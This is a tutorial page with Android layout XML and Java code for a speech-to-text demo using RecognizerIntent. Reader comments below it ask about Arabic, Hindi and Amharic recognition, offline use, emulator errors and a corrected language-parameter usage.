CC-MAIN-2020-34
refinedweb
240
59.8
In this article the term "combinator" refers to the combinator pattern A style of organizing libraries centered around the idea of combining things. Usually there is some type T, some "primitive" values of type T, and some "combinators" which can combine values of type Tin various ways to build up more complex values of type T So the general shape of a combinator is combinator: Thing -> Thing The goal of a combinator is to create new "things" from previously defined "things". Since the result can be passed back as input, you get a combinatorial explosion of possibilities, which makes this pattern very powerful. If you mix and match several combinators together, you get an even larger combinatorial explosion. So a design that you may often find in a functional module is - a small set of very simple "primitives" - a set of "combinators" for combining them into more complicated structures Let's see some examples. Example 1: Eq The getEq combinator: given an instance of Eq for A, we can derive an instance of Eq for Array<A> import { Eq } from 'fp-ts/lib/Eq' export function getEq<A>(E: Eq<A>): Eq<Array<A>> { return { equals: (xs, ys) => xs.length === ys.length && xs.every((x, i) => E.equals(x, ys[i])) } } Usage /** a primitive `Eq` instance for `number` */ export const eqNumber: Eq<number> = { equals: (x, y) => x === y } // derived export const eqArrayOfNumber: Eq<Array<number>> = getEq(eqNumber) // derived export const eqArrayOfArrayOfNumber: Eq<Array<Array<number>>> = getEq(eqArrayOfNumber) // derived export const eqArrayOfArrayOfArrayOfNumber: Eq<Array<Array<Array<number>>>> = getEq( eqArrayOfArrayOfNumber ) // etc... Another combinator, contramap: given an instance of Eq for A and a function from B to A, we can derive an instance of Eq for B export const contramap = <A, B>(f: (b: B) => A) => (E: Eq<A>): Eq<B> => { return { equals: (x, y) => E.equals(f(x), f(y)) } } Usage export interface User { id: number name: string } export const eqUser: Eq<User> = contramap((user: User) => user.id)(eqNumber) // mix with `getArraySetoid` export const eqArrayOfUser: Eq<Array<User>> = getEq(eqUser) Example 2: Monoid The getIOMonoid combinator: given an instance of Monoid for A, we can derive an instance of Monoid for IO<A> import { IO } from 'fp-ts/lib/IO' import { Monoid } from 'fp-ts/lib/Monoid' export function getIOMonoid<A>(M: Monoid<A>): Monoid<IO<A>> { return { concat: (x, y) => () => M.concat(x(), y()), empty: () => M.empty } } We can use getIOMonoid to derive another combinator, replicateIO: given a number n and an action mv of type IO<void>, we can derive an action that performs n times mv import { fold } from 'fp-ts/lib/Monoid' import { replicate } from 'fp-ts/lib/Array' /** a primitive `Monoid` instance for `void` */ export const monoidVoid: Monoid<void> = { concat: () => undefined, empty: undefined } export function replicateIO(n: number, mv: IO<void>): IO<void> { return fold(getIOMonoid(monoidVoid))(replicate(n, mv)) } Usage // // helpers // /** logs to the console */ export function log(message: unknown): IO<void> { return () => console.log(message) } /** returns a random integer between `low` and `high` */ export const randomInt = (low: number, high: number): IO<number> => { return () => Math.floor((high - low + 1) * Math.random() + low) } // // program // import { chain } from 'fp-ts/lib/IO' import { pipe } from 'fp-ts/lib/pipeable' function fib(n: number): number { return n <= 1 ? 1 : fib(n - 1) + fib(n - 2) } /** calculates a random fibonacci and prints the result to the console */ const printFib: IO<void> = pipe( randomInt(30, 35), chain(n => log(fib(n))) ) replicateIO(3, printFib)() /* 1346269 9227465 3524578 */ Example 3: IO We can build many other combinators for IO, for example the time combinator mimics the analogous Unix command: given an action IO<A>, we can derive an action IO<A> that prints to the console the elapsed time import { IO, io } from 'fp-ts/lib/IO' import { now } from 'fp-ts/lib/Date' import { log } from 'fp-ts/lib/Console' export function time<A>(ma: IO<A>): IO<A> { return io.chain(now, start => io.chain(ma, a => io.chain(now, end => io.map(log(`Elapsed: ${end - start}`), () => a))) ) } Usage time(replicateIO(3, printFib))() /* 5702887 1346269 14930352 Elapsed: 193 */ With partials... time(replicateIO(3, time(printFib)))() /* 3524578 Elapsed: 32 14930352 Elapsed: 125 3524578 Elapsed: 32 Elapsed: 189 */ Can we make the time combinator more general? We'll see how in the next article. Posted on by: Discussion I recently wrote about the combinator pattern in my article on property testing via JSVerify. I blinked just now at reading the phrase "combinatorial explosion" which we both used in our articles – but it turns out you wrote it first (Feb. vs Mar.)! Um, great minds think alike? Anyway, combinators to me represent almost the entire point of FP – composition. The ability to connect pieces of code together seamlessly, building up complexity without getting lost in the wiring. This article has some nice examples. I recently became aware of FP-TS from a tweet; it looks good! Might be the lever that finally pushes me into adopting TS itself, as FP in JS works but I miss the typing of e.g. Haskell. Enjoying your article series, thanks for posting it. Hey you might enjoy exploring how this term is used in a variety of contexts, it's quite useful! google.com/search?q=combinatorial+... About you search on functional JS typing, you may already heard of Sanctuary-def. You loose static analysis but gain runtime (optional) type system. It supports Hindley-Milner like type signature. This seems to be a nice post, but typescript makes it so hard to read... I don't see any "time" combinator here, and the reference to it in the next post isn't really coming from here. What am I missing? Example 3 was missing, thanks for pointing out
https://dev.to/gcanti/functional-design-combinators-14pn
CC-MAIN-2020-40
refinedweb
953
50.77
On Wed, 27 Jun 2012 17:44:23 -0700, alex23 wrote: > If you believe providing a complementary __past__ namespace will work - > even though I believe Guido has explicitly stated it will never happen - > then the onus is on you to come up with an implementation. Guido speaks only for CPython. Other implementations can always do differently. The Python 3 naysayers are welcome to fork Python 2.7 and support it forever, with or without a __past__ namespace. That's the power of open source software. And who knows, if it becomes popular enough, perhaps it will be ported to CPython too. -- Steven
https://mail.python.org/pipermail/python-list/2012-June/625917.html
CC-MAIN-2016-36
refinedweb
102
65.73
In the following Object Gallery, select New Console icon and click OK button. Enter the project name and choose the desired path. Then click the Next button. The nice part of this compiler, depend on your installation (Windows, Linux or Solaris), choose the target platform of your project. For this example, choose the Borland Win32 Compiler Tools. Then click the Next button. Specify the source filename for this project. For this example, sourcefile1 has been entered. Then click Finish button. The following programming environment will be displayed. Now we are ready to enter the source codes. Type the C++ codes or copy and paste into the right window, the editor :o). The following program example can be used for your first project. // By using predefined sizeof() function, // displaying the data type size, 1 byte = 8 bits #include <iostream> using namespace std; int main() { cout<<"The size of an int is:\t\t"<<sizeof(int)<<" bytes.\n"; cout<<"The size of a short int is:\t"<<sizeof(short)<<" bytes.\n"; cout<<"The size of a long int is:\t"<<sizeof(long)<<" bytes.\n"; cout<<"The size of a char is:\t\t"<<sizeof(char)<<" bytes.\n"; cout<<"The size of a float is:\t\t"<<sizeof(float)<<" bytes.\n"; cout<<"The size of a double is:\t"<<sizeof(double)<<" bytes.\n"; cout<<"The size of a bool is:\t\t"<<sizeof(bool)<<" bytes.\n"; return 0; } Now you are ready to build (compile and link) your project. Select Project menu and select Rebuild "your_source_file_name.cpp". Any error or warning will be displayed in the bottom window. If there is no error, you are ready to run your program. Click Run menu and select Run Project sub menu. The output will be displayed in the bottom window. -------------------------------------------------------------------- Let try another program example that prompting user input. #include <iostream> using namespace std; int main() { int job_code, car_allowance; int housing_allowance, entertainment_allowance; cout<<"Available job codes: 1 or non 1:\n"<<endl; cout<<"Enter job code: "; cin>>job_code; if(job_code==1) { car_allowance = 200.00; housing_allowance = 800.00; entertainment_allowance = 250.00; cout<<"Benefits: \n"; cout<<"Car allowance: "<<car_allowance<<endl; cout<<"Housing allowance: "<<housing_allowance<<endl; cout<<"Entertainment allowance: "<<entertainment_allowance<<endl; } else { car_allowance = 100.00; housing_allowance = 400.00; entertainment_allowance = 150.00; cout<<"Benefits: \n"; cout<<"Car allowance: "<<car_allowance<<endl; cout<<"Housing allowance: "<<housing_allowance<<endl; cout<<"Entertainment allowance: "<<entertainment_allowance<<endl; } return 0; } The output sample: Well, very nice compiler huh!. By the way, don’t forget to explore other menus, short cuts etc. and the GUI programming. ------ Further digging: Check the best selling C, C++ and Compilers at Amazon.com.
http://www.tenouk.com/BbuilderX.html
crawl-002
refinedweb
431
61.53
Comment: Re:Why not copy MS and have 2 ver numbers (Score 1) 183 Comment: Re:Fraud/abuse alert... apk (Score -1, Offtopic) 90 Comment: Re:Um, why? (Score 1) 252 Comment: Re:Mass-Media Report (Score 1) 470 Comment: Re:GitHub link (Score 1) 54 Comment: Re:New GNOME Shell design (Score 3, Insightful) 201 Given Truth, the Misinformed Believe Lies More 961 Comment: Re:2 articles that don't need to be posted anymore (Score 1) 161 Comment: Re:Gotta love... (Score 1) 1131 Lan. Comment: Re:Is It As Easy As Pie? (Score 1) 150 With apologies to Carl Sagon. With apologies to Carl Sagan. Comment: Re:Who cares? (Score 1) 306 Wait cox didn't offer real binary access for free up til this did they? Comment: Re:Good idea. (Score 1) 278 Has this simple fact entered anyone's mind. Take the following example for instance: #include <iostream> #include <string> using namespace std; template < size_t N > struct Q { ostream & operator()() { return Q<(N>>6)>()() << ((char)(30+N%64)); } }; template < > struct Q<0> { ostream & operator()() { return cout;} }; template <class H, class T> struct P { }; typedef P< Q<0x29c71a6e>, P< Q<0x270a8c74>, P< Q<0x2da7bf2>, P< Q<0x2e8f69c2>, P< Q<0x2f9f68c2>, P< Q<0x32d31a74>, P< Q<0x23befaf0>, Q<0x29082082> > > > > > > > M; template < class H > struct V { void operator()() { H()(); } }; template < class H, class T > struct V<P<H, T> >{ void operator()() { H()(); V<T>()(); }; }; int main() { V<M>()(); // Edit: if I escape the backslash, an extra space appears between \ and n; if I don't then the 'n' is invisible? } source: the output is: GOOGLE FOR TEMPLATE META PROGRAMMING Would any one in their right mind imagine this? I am sure python has to be capable of this kind of convolution. If not, then ruby has a one up on py. I am too lazy to convert this c++ demon into a ruby script. I'll leave that as an exercise to the reader. EDIT: when I try to post this, it is giving me a too few characters per line issue. What is up with slashdot these days? I don't mean to go on a rant, but some of their validations is insane?
http://slashdot.org/~xxdinkxx/tags/noshit
CC-MAIN-2014-23
refinedweb
367
71.65
Running other C++ applications on QT? How to run other C++ applications and get it to build on QT creator? - ambershark Moderators @AAlex7 What do you mean? You mean like a non-Qt application? I would just use cmake and a CMakeLists.txt, which Qt Creator can load. You could use qmake too, but then you have at least a bit of qmake involved. I.e. main.cpp #include <iostream> using namespace std; int main(int ac, char **av) { cout << "hello world" << endl; return 0; } CMakeLists.txt cmake_minimum_required(VERSION 3.8) project(myproject) add_executable(${PROJECT_NAME} main.cpp) Then open that CMakeLists.txt file in qt creator and press build. Also CMake fully supports Qt so you can add Qt to your project later if you'd like. - aha_1980 Qt Champions 2017 @AAlex7 Just run File -> New File or Project to see the list of possible projects with the different supported build systems.
https://forum.qt.io/topic/87014/running-other-c-applications-on-qt
CC-MAIN-2018-39
refinedweb
152
78.35
Directx11 return code definition #1 Members - Reputation: 223 Posted 25 April 2013 - 04:03 AM #3 Members - Reputation: 223 Posted 26 April 2013 - 03:26 AM I'm including the following, but it still can't find the definition. #include <dxgi.h> #include <d3dcommon.h> #include <d3d11_1.h> #include <d3dcompiler.h> #4 Crossbones+ - Reputation: 2531 Posted 26 April 2013 - 02:05 PM this may not get you the compiler though. it does gets you a DXGI device context, so it seems to include DXGI. D3DERR_INVALIDCALL is defined in D3DX11core.h: #define D3DERR_INVALIDCALL MAKE_D3DHRESULT(2156) note that this is from the june 2010 sdk version of directx 11, not the win8 sdk version of dx11. there may be an 11.0 vs 11.1 version thing going on between them. Edited by Norman Barrows, 26 April 2013 - 02:13 PM. Norm Barrows Rockland Software Productions "Building PC games since 1989" PLAY CAVEMAN NOW! #5 Members - Reputation: 223) #6 Crossbones+ - Reputation: 2531! #7 Members - Reputation: 223 Posted 28 April 2013 - 01:46 AM Yes, I was getting some errors so I wanted to catch all the possible return codes. I sent a mail, hopefully they will update the documentation.
http://www.gamedev.net/topic/642301-directx11-return-code-definition/
CC-MAIN-2015-14
refinedweb
197
68.36
I had cluster A with a static IP on a load balancer, but needed to move a deployment to service B whilst maintaining the same static IP address. I did the following: - Removed the loadbalancer from cluster A. - Created a new loadbalancer in cluster B, and then after it was created assigned the static IP address to it via the networking screen, and at the same time removed the ephemeral IP address. - Hoped for success. The load balancer service on the GCS portal under Kubernetes Engine > Services looks like this: apiVersion: v1 kind: Service metadata: annotations: service.beta.kubernetes.io/aws-load-balancer-backend-protocol: tcp name: contour namespace: heptio-contour spec: clusterIP: x.x.x.x externalTrafficPolicy: Cluster ports: - name: http nodePort: 31774 port: 80 protocol: TCP targetPort: 8080 - name: https nodePort: 30314 port: 443 protocol: TCP targetPort: 8443 selector: app: contour sessionAffinity: None type: LoadBalancer status: loadBalancer: ingress: - ip: e.e.e.e At present the IP address is the ephemeral IP address e.e.e.e, and this is what the details tab shows as both the "external endpoints" and the "loadbalancer" IP. If I click through to the linked load balancer (found under Network Services > Load Balancing), I can see that the frontend IP is s.s.s.s (my static IP) for ports 80-443 - I'm specifically trying to access ports 80 and 443. I've found that I can't change the load balancer IP at the bottom of the YAML config file - after I save, it just reverts my changes. I've also tried adding loadBalancerIP: s.s.s.s below clusterIP but this didn't make a difference. Finally, I've gone to the static IP itself and ensured that the forwarding rule was pointed at the correct load balancer. My question is: What steps do I have to take to successfully assign this external IP address to an existing load balancer, and have it serve traffic to the cluster? Kubernetes service: Load balancer:
https://serverfault.com/questions/942247/how-do-i-update-the-loadbalancer-ip/942386
CC-MAIN-2021-21
refinedweb
333
61.87
Approval Tests: Locking Down Legacy Code Approval Tests: Locking Down Legacy Code Join the DZone community and get the full member experience.Join For Free Suppose, you working on project with a lot of legacy code inside. I know it makes you sick, but as brave developer you want to improve things. You met that ugliest method in your life and only one thing you want to do - refactor it. But refactoring is dangerous procedure. For safe refactoring you need to have good test coverage. But wait, it is legacy code. You simply have no tests. What to do? Approvals have answer. Legacy code is the code that... Works! Right, it is ugly, un-supportable, nothing you can easy change there. But the most wonderful feature of that code - it works for years. And first thing is to get advantage of that fact! Here is my "just for example" legacy method. namespace Playground.Legacy { public class HugeAndScarryLegacyCode { public static string TheUgliesMethodYouMightEverSeen(string s, int i, char c) { if (s.Length > 5) { s += "_some_suffix"; } var r = new StringBuilder(); foreach (var k in s) { if ((int)k % i == 0) { r.Append(c); } else { if (k == c) { if (r.Length <= 2) { r.Append('a'); } else { r.Append('b'); } } if (k == '^') { r.Append('c'); } else { r.Append(k); } } } return r.ToString(); } } } (it's it ugly enough?) It has a cycles, nested if-else case and all nice features of legacy code. We need to change it, but in the same time guarantee it would not be broken. Trying first simple test Supposing also, I'm not much in details of how exactly this function works.. So, I'm creating the test like: [Test] public void shoudl_work_some_how() { Approvals.Approve(HugeAndScarryLegacyCode.TheUgliesMethodYouMightEverSeen("someinput", 10, 'c')); } I run it and got some result to approve: I approve that, cause I know that function works. But something inside tells you - that is not enough. Try to run in under the coverage: That does not make me real confident with tests only one hit and coverage 76%. We have to create better tests cases. Use combinations of arguments Approvals include some tools to deal this case. Let's change out test and write something like, [Test] public void should_try_to_cover_it() { var numbers = new[] { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 }; var chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ".ToCharArray(); var strings = new[] { "", "approvals", "xpdays", "^stangeword^" }; ApprovalTests.Combinations.Approvals.ApproveAllCombinations( (s, i, c) => HugeAndScarryLegacyCode.TheUgliesMethodYouMightEverSeen(s, i, c), strings, numbers, chars); } With only few lines of code, I've got 1560 test cases and all of them are correct! Besides, I got pretty good coverage. Ideal, I would say. Now, if even one small change would happen, some of 1560 tests will notice that. Locking down The process of controlling the legacy code in that way is called "Locking down". After the code is locked down, you have high confidence (read low risk) of breaking changes you introduce. Please note how low effort it was to create all that 1560 tests and how much value gained in that. Notice, that test like should_try_to_cover_it is not supposed to "live forever". You probably even don't need to check it in to source control. You just do your job, either refactoring or changing that functionality and use Approvals to notify you as fast as possible of something goes wrong. }}
https://dzone.com/articles/approval-tests-locking-down
CC-MAIN-2018-30
refinedweb
554
68.47
input to the NavMesh builder is a list of NavMesh build sources. Their shape can be one of the following: mesh, terrain, box, sphere, or capsule. Each of them is described by a NavMeshBuildSource struct. You can specify a build source by filling a NavMeshBuildSource struct and adding that to the list of sources that are passed to the bake function. Alternatively, you can use the collect API to quickly create NavMesh build sources from available render meshes or physics colliders. See NavMeshBuilder.CollectSources. If you use this function at runtime, any meshes with read/write access disabled will not be processed or included in the final NavMesh. See Mesh.isReadable. using UnityEngine; using UnityEngine.AI; public class Example : MonoBehaviour { // Make a build source for a box in local space public NavMeshBuildSource BoxSource10x10() { var src = new NavMeshBuildSource(); src.transform = transform.localToWorldMatrix; src.shape = NavMeshBuildSourceShape.Box; src.size = new Vector3(10.0f, 0.1f, 10.0f); return src; } } Did you find this page useful? Please give it a rating:
https://docs.unity3d.com/ScriptReference/AI.NavMeshBuildSource.html
CC-MAIN-2019-13
refinedweb
168
65.62
Pipes are useful in Angular because it is used to transform the data in a template. Let's take an example of date, a date in raw string looks like `Tue Apr 02 2019 13:37:27 GMT+0530 (India Standard Time)` and what if you don't want to show a raw string to the user but only a simple format like April 02, 2019. You might be thinking that this can easily be done in the typescript file, but instead if you only want it for displaying purpose why not transform it on the template using pipes. So the main concept of using Pipes is whenever we want to perform some logic to transform the data inside our templates we use pipes. We use a pipe with the | syntax in the template. So like our example if we want to transform the date we will write : {{ myDate | date:'longDate' }} The above code will take the date and transform it to long date string. Understanding Reactive and Template-driven Forms in Angular Built-In PipesAngular provides a lot of built-in pipes and they are : 1. CurrencyPipe - It transforms a number to a currency. {{ 1234.45 | currency:'INR'}} // ₹1,234.45 {{ 1234.45 | currency:'INR':'code'}} // INR1,234.45 2. DatePipe - It transforms date value {{ '1554195345528' | date:'longDate' }} // April 2, 2019 {{ '1554195345528' | date:'full' }} // Tuesday, April 2, 2019 at 2:25:45 PM GMT+05:30 3. DecimalPipe - It transforms a decimal to a string. It takes a format string of the form {minIntegerDigits}.{minFractionDigits}-{masFractionDigits} {{ 1.4587545 | number: '3.1-4'}} //001.4588 4. JsonPipe - It transforms a value into JSON-format. Let's say we have a JSON in our typescipt file myJson = { a: 'a', b: { c: 'd' }} {{ myJson }} // [object Object] {{ myJson | json }} // {"a": "a", "b": {"c": "d"}} 5. LowerCasePipe, UpperCasePipe and TitleCasePipe - It transforms text to lower case, upper case and title case (capitalizes first letter) respectively. {{ 'coDing DeFined' | lowercase }} // coding defined {{ 'coDing DeFined' | uppercase }} // CODING DEFINED {{ 'coDing DeFined' | titlecase }} // Coding Defined 6. PercentPipe - It transforms a number to a percentage string {{ .256 | percent}} // 26% 7. SlicePipe - It creates a new string containing a subset of the elements {{ 'Coding Defined ' | slice:0:5 }} // Codin 8. AsyncPipe - It transforms an Observable or Promise to the output. In simple terms it means that async pipe subscribes to an Observable and Promise and returns the value it emitted. Lets have the below code in our typescript file export class AppComponent implements OnInit { myPromise: Promise<string>; ngOnInit() { this.myPromise = this.getData(); } getData() { return new Promise<string>((resolve,reject) => { setTimeout(() => resolve("Got Data"), 2000); }); } } And in the template file we will write, thus after 2 seconds we will able to see our data {{ myPromise | async }} How to Solve: InvalidPipeArgument for pipe 'AsyncPipe'Sometimes you might get the error as InvalidPipeArgument for pipe 'AsyncPipe', it actually means that you are not binding the async to Observables and Promises. Thus always check if the data you are binding to AsyncPipe is Observables or Promise and not anything else. Parameterized PipesSo we have looked at almost all the built in pipes. One thing you might have noticed is that we used ':' (colon) after some of the pipes and those are parameters to the pipes. Thus to add a parameter to a pipe, you just have to add a colon (:) after the pipe name like currency:'INR'. The pipe can accept multiple parameters, where you have to separate the values with colons like slice:0:5. Understanding Observable - A key Concept in Angular Chaining PipesWe can also chain pipes together as shown below, where the data when received is changed to uppercase {{ myPromise | async | uppercase }} How to Create Custom PipesLet's create a simple TimeAgo Pipe which tells 'few seconds ago', 'few minutes ago' etc. We will name our pipe as simpletimeago. So when we use it in the template it will look like {{ date | simpletimeago }} Thus we will create a new file called simpletimeago.pipe.ts, which should have one special method to be used as a pipe and that is transform. To create a Pipe, we must implement PipeTransform interface and have trasnform method in our class. The transform methos will also get a value which will get transformed, in our case the value is of type Date. It also should have a @Pipe decorator, which marks a class as pipe and supplies configuration metadata like name an pure/unpure. import { Pipe, PipeTransform } from '@angular/core'; @Pipe({ name: 'simpletimeago' }) export class SimpleTimeAgoPipe implements PipeTransform { transform(value: Date): string { let timeNow = new Date(); let seconds = Math.floor((timeNow.getTime() - value.getTime()) / 1000); let minutes = Math.floor(seconds / 60); if(seconds <= 30) { return 'a few seconds ago'; } else if(seconds <= 75) { return 'a minute ago'; } else { return minutes + ' minutes ago'; } } } The code just checks if the difference between the seconds is less than 30 it will display 'a few seconds ago', if the seconds is less than 75 it will display 'a minute ago', otherwise it will display total minutes ago. Then I have to add my pipe to the Declarations in the app module as shown below : import { SimpleTimeAgoPipe } from './simpletimeago.pipe'; @NgModule({ declarations: [ SimpleTimeAgoPipe ], }) My app.component looks like below where I am creating a new date for displaying different strings import { Component, OnInit } from '@angular/core'; @Component({ selector: 'my-app', templateUrl: './app.component.html', styleUrls: [ './app.component.css' ] }) export class AppComponent implements OnInit { secondsDate: Date; minutesDate: Date; moreMinutesDate: Date; ngOnInit() { this.secondsDate = new Date( Date.now() ); this.minutesDate = new Date( Date.now() - 1000 * 60 ); this.moreMinutesDate = new Date( Date.now() - 1000 * 600 ); } } And in the template I will be showing: <br> {{ secondsDate | simpletimeago }} <br> {{ minutesDate | simpletimeago }} <br> {{ moreMinutesDate | simpletimeago }} <br> Which will display as : a few seconds ago a minute ago 10 minutes ago Thus we have successfully created a Pipe. Hope you understand how Pipes work in Angular.
https://www.codingdefined.com/2019/04/why-pipes-are-useful-in-angular-and-how.html
CC-MAIN-2019-43
refinedweb
977
61.56
chemfp is a set of command-lines tools for generating cheminformaticsfingerprints and searching those fingerprints by Tanimoto similarity,as well as a Python library which can be used to build new tools.These algorithms are designed for the dense, 100-10,000 bitfingerprints which occur in small-molecule/pharmaceuticalchemisty. The Tanimoto search algorithms are implemented in C forperformance and support both threshold and k-nearest searches.Fingerprint generation can be done either by extracting existingfingerprint data from an SD file or by using an existing chemistrytoolkit. chemfp supports the Python libraries from Open Babel,OpenEye, and RDKit toolkits. Project description A Python library and set of tools for working with cheminformatics fingerprint data. For more information, see . See THANKS for the people who have contributed in some fashion. (If I've left your name out or didn't credit you correctly, let me know.) Install in the normal Python way: python setup.py install You may need a 'sudo' or be root, depending on your system. If you get a message like: unrecognized command line option "-fopenmp" then your compiler does not understand OpenMP. To compile without OpenMP append "--without-openmp" to the setup.py line. If you get a message like: cc1: error: invalid option ssse3 -or- cc1: error: unrecognized command line option "-mssse3" then your compiler does not understand the SSSE3 intrinsics. To compile without the SSSE3 intrinsics, append "--without-ssse3" to the setup.py line. For example, to compile in a Mac with gcc-4.0 using sudo: sudo python setup.py install --without-openmp --without-ssse3 Note: chemfp requires a C compiler to build the _chemfp extension. If you use Visual Studio for Microsoft Window then you will either need the 2008 version or you will have to patch your version of Python to handle 2010 or newer. See . Documentation? Certainly! Go to: or use '--help' on any of the command-line programs: rdkit2fps --help ob2fps --help oe2fps --help sdf2fps --help simsearch --help or (for parts of the public API), look at the doc strings import chemfp help(chemfp) There are many tests. To run them: cd tests python unit2 discover Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/chemfp/1.1p1/
CC-MAIN-2020-10
refinedweb
378
55.24
I have two Python dictionaries, and I want to write a single expression that returns these two dictionaries, merged. The update() >>> x = {'a':1, 'b': 2} >>> y = {'b':10, 'c': 11} >>> z = x.update(y) >>> print z None >>> x {'a': 1, 'b': 10, 'c': 11} dict.update() How can I merge two Python dictionaries in a single expression? Say you have two dicts and you want to merge them into a new dict without altering the original dicts: x = {'a': 1, 'b': 2} y = {'b': 3, 'c': 4} The desired result is to get a new dictionary ( z) with the values merged, and the second dict's values overwriting those from the first. >>> z {'a': 1, 'b': 3, 'c': 4} A new syntax for this, proposed in PEP 448 and available as of Python 3.5, is z = {**x, **y} And it is indeed a single expression.. If you are not yet on Python 3.5, or need to write backward-compatible code, and you want this in a single expression, the most performant while correct approach is to put it in a function: def merge_two_dicts(x, y): '''Given two dicts, merge them into a new dict as a shallow copy.''' z = x.copy() z.update(y) return z and then you have a single expression: z = merge_two_dicts(x, y) You can also make a function to merge an undefined number of dicts, from zero to a very large number: def merge_dicts(*dict_args): ''' Given any number of dicts, shallow copy and merge into a new dict, precedence goes to key value pairs in latter dicts. ''' result = {} for dictionary in dict_args: result.update(dictionary) return result This function will work in Python 2 and 3 for all dicts. e.g. given dicts a to g: z = merge_dicts(a, b, c, d, e, f, g) and key value pairs in g will take precedence over dicts a to f, and so on. Don't use what you see in the most upvoted. Also, this dicts have precedence) You can also chain the dicts()) itertools.chain will chain the iterators over the key-value pairs in the correct order: import itertools z = dict(itertools.chain(x.iteritems(), y.iteritems())) I'm only going to do the performance analysis of the usages known to behave correctly. import timeit The following is done on Ubuntu 14.04 In Python 2.7 (system Python): >>> min(timeit.repeat(lambda: merge_two_dicts(x, y))) 0.5726828575134277 >>> min(timeit.repeat(lambda: {k: v for d in (x, y) for k, v in d.items()} )) 1.163769006729126 >>> min(timeit.repeat(lambda: dict(itertools.chain(x.iteritems(), y.iteritems())))) 1.1614501476287842 >>> min(timeit.repeat(lambda: dict((k, v) for d in (x, y) for k, v in d.items()))) 2.2345519065856934 In Python 3.5 (deadsnakes PPA): >>> min(timeit.repeat(lambda: {**x, **y})) 0.4094954460160807 >>> min(timeit.repeat(lambda: merge_two_dicts(x, y))) 0.7881555100320838 >>> min(timeit.repeat(lambda: {k: v for d in (x, y) for k, v in d.items()} )) 1.4525277839857154 >>> min(timeit.repeat(lambda: dict(itertools.chain(x.items(), y.items())))) 2.3143140770262107 >>> min(timeit.repeat(lambda: dict((k, v) for d in (x, y) for k, v in d.items()))) 3.2069112799945287
https://codedump.io/share/0CHt6H53hFqj/1/how-to-merge-two-python-dictionaries-in-a-single-expression
CC-MAIN-2018-13
refinedweb
534
72.66
<LinearLayout xmlns: <ImageButton android: <TextView android: </LinearLayout> package net.viralpatel.android.speechtotextdemo; import java.util.ArrayList; import android.app.Activity; import android.content.ActivityNotFoundException; import android.content.Intent; import android.os.Bundle; import android.speech.RecognizerIntent; import android.view.Menu; import android.view.View; import android.widget.ImageButton; import android.widget.TextView; import android.widget.Toast; public class MainActivity extends Activity { protected static final int RESULT_SPEECH = 1; private ImageButton btnSpeak; private TextView txtText; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); txtText = (TextView) findViewById(R.id.txtText); btnSpeak = (ImageButton) findViewById(R.id.btnSpeak); btnSpeak.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { Intent intent = new Intent( RecognizerIntent.ACTION_RECOGNIZE_SPEECH); intent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_MODEL, "en-US"); try { startActivityForResult(intent, RESULT_SPEECH); txtText.setText(""); } catch (ActivityNotFoundException a) { Toast t = Toast.makeText(getApplicationContext(), "Opps! Your device doesn't support Speech to Text", Toast.LENGTH_SHORT); t.show(); } } }); } @Override public boolean onCreateOptionsMenu(Menu menu) { getMenuInflater().inflate(R.menu.activity_main, menu); return true; } ); txtText.setText(text.get(0)); } break; } } } } Recogn This part is not right: intent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_MODEL, “en-US”); Should be: intent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_MODEL, RecognizerIntent.LANGUAGE_MODEL_FREE_FORM); intent.putExtra(RecognizerIntent.EXTRA_LANGUAGE, “en-US”); thanks! I am trying to change the language of the recognition from English to Arabic and I simply did this intent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_MODEL, “ar-QA”); // Qatari Arabic But I get the text in English which is fine with me but interpreted wrong for example, I say “Yameen = right” >> I get the text as “Yeah mean” :) any suggestions on how I might be able to change the language of the recognition and the text?! another question, why do I have the button to activate the recognition, can’t I simply keep it listening the min I run the app? Thank you so much in advance for helping me understand :) use this Hi Viral Patel thanks for such a nice tutorial this program working perfect but i have some question regarding this post, this program recognize only alphabets not numeric or number if i say 100 it will print hundred, actually i want a result if i say 100 then it will show numeric value not a alphabets, can you help me out on this ????? Hello viral patel, Thanks for sample application. It is working good. but in some devices it is working fine with out internet connection. but in some devices , it needs internet connection. Is there any other option to make speech to text in offline mode with out internet. Thanks, PRatap Is it possible to run the recognizer intent in the background and it is possible to convert a audio file to text by using this API in android. Hey i want to know can i manually give input to the api . Like a recording to the api to convert it to text ?? Hello, Great and easy example, can you please give me some suggestions my problem is i want to use the same functionality in a simple java class (non-activity class). how can i achieve this .? hi viral,i’m purushoth,i seen your project it’s fine k k ,i tried in my system this was not run properly if i click the button it’s record my speech it shows only the button(its first screen shot only displayed} help me… What is the language tag for hindi-India? i download the source code and running it on sdk vertiual andriod device by it giving me error that (opp’s your device do not support speech to text ) what i have to do now maybe you have to cut and paste! You must run the Android Project in real device (smartphone). It isn’t run in vitural device because vitural device not supported das ist bundaba!, excellent, muy bacano—- felicitaciones Es heißt wunderbar. Aber egal… sir, this speech to text demo is not working in w-ifi.plz send me the code so it work in w-ifi. I am still waiting for your answer. vertiual andriod device display an error …opp’s your device do not support speech to text …..any one can help me Speech recognition is not supported by it, you have to test on some Android device with this functionality and this API. please,please who can answer my question:when i change the language of the recognition from English to Arabic i use(ar_SA) it is done but without any open,vibrio,Fracture and serenity on the arabic letters ,so what should i do to get the open,vibrio,Fracture and serenity on the arabic letters? Thank you so much in advance for helping me understand please help me soon:i want that when i read quran karim the program write it with full arabic language i mean with open,vibrio,Fracture , serenity and others on the arabic letters ,i change en-US to ar_SA its done but but without any open,vibrio,Fracture , serenity and others on the arabic letters ,so what should i do,please?or whats the type of english language that i can use to write every letter when i said in arabic language then it writes in english letter for example when i say “بِسْمِ الله” it will write “bismilah”. please,please answer me In my device, this application is not running without an Internet connection. What’s wrong? hey can anybody mail me code for intenet class r.id cannot be resolved error plz help me guys..!!! Clean your project. If you still see the error then make sure you are importing the correct R class. android.R is the OS provided class while yourpackagename.R will be your class generated on build. I want to change the language of the recognition from English to Amharic language. any suggestions on how I might be able to change the language of the recognition and the text?! hello sir, i am doing a project on voice recognization i,e text to voice and voice to text, sir i got text to voice and i wrote the code for voice to text, but in emulator its coming that this device doesn’t support this application, so what to do sir 